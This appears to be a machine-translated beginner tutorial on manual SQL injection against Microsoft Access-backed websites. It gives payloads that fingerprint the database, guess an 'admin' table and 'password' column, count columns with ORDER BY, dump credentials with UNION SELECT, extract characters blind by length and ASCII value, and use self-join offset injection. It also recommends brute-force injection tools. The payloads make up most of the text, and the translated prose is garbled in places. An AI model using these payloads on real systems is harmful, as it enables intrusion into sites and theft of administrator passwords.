Novice first contact is injected by hand through the novice stage will begin after the use of tools, such as reaching the level of the Great God will find a lot of things tool can not do, this process is called back to nature.
.Access introduce a database
Microsoft Office Access is published by Microsoft relational database management systems. It combines the Microsoft Jet Database Engine and two graphical user interface features, is one of the Microsoft Office system programs. As for what else I do not long-winded mess up. However, care must be taken to his advantage (defects) (manual funny)
The basic steps of two injection .access
1. First, after the url plus a " '" in order to determine whether there is injected (to see whether the principle is being given by will' into the inquiry)
2.and 1 = 1 if the observation errors, it is judged that there is no error injection vulnerability
3.and 1 = 2 with error description to go in, go in with no proper explanation (and sometimes will be filtered)
4. Analyzing the database type (originally should - -, but the visual effect is not good, so I used - a)
and exsits(select * from msysobjects)>0 -access数据库
and exsits(select * from sysobjects)>0 -sqlserver数据库
5. determine what database table (table name most companies will not be so simple admin, ...)
and exists(select * from admin)
6. The field judge, for example, determine whether the password field (most of the column name is not so simple password)
and exists(select password from admin)
7. The field length is determined, the display is the presence of normal, abnormal is not present, the test until the out of date, such as the normal 22, 23 is given 22.
order by 20
order by 30
8. Here in accordance with the order by 5 Forget it (remember to make him an error), then he will complain, for example, an error in the 2 and 4
and 1=2 union select 1,2,3,4,5 from admin
and 1=2 union select 1,admin,3,password,5 from admin
9. special episode: Analyzing Password length
and (select len(admin) from admin)=5 -如果返回正常说明管理员账户长度为5
and (select len(password) from admin)=5 -猜解管理员密码的长度是否为5
10. The special episode 2: a first judgment data administrator account, is determined by determining ascii code
and (select top 1 asc(mid(admin,1,1)) from admin)>100 -返回正常说明大于100
and (select top 1 asc(mid(admin,2,1)) from admin)>100 -账户的第二个数据
and (select top 1 asc(mid(password,1,1)) from admin)>100 -密码第一个数据
III. Here, you can a novice area doing the task, and start using the equipment (tools)
Here, I am using ah D injection tool (that is, the principle of brute force) (then 5)
the use of tools is very simple, as long as the database and then determine what is detected on the line. Of course, he is not a panacea, and sometimes also not get the dictionary out, this time we should change you. . .
Let's try it out boy
one minite later…
many years later…
Well, I do not know why I can not get out kid (do not care about these details).
In short more than a few tools to try, always some more advanced dictionary, then try out (though some have a firewall, the request will be banned too often)
11. The offset launch (now we assume that the table has been judged, but guess column name, one by one, this time with a Previous replace *)
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,* from admin
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from admin
16 has been deleted to return to the normal 3 and 15
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin
There is a formula: field length - final length, is 22-16 = 6; 10 and 6 + 2 = 22; 6 4 + 3 = 22 (remember on the line) **
union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id)inner join admin as c on a.id=c.id)
We can combine these two codes look at the formula is not found out what the law, but you can not write (in fact, mainly because I did not understand)
- He came out of the result is a table of values in that column random and not necessarily name
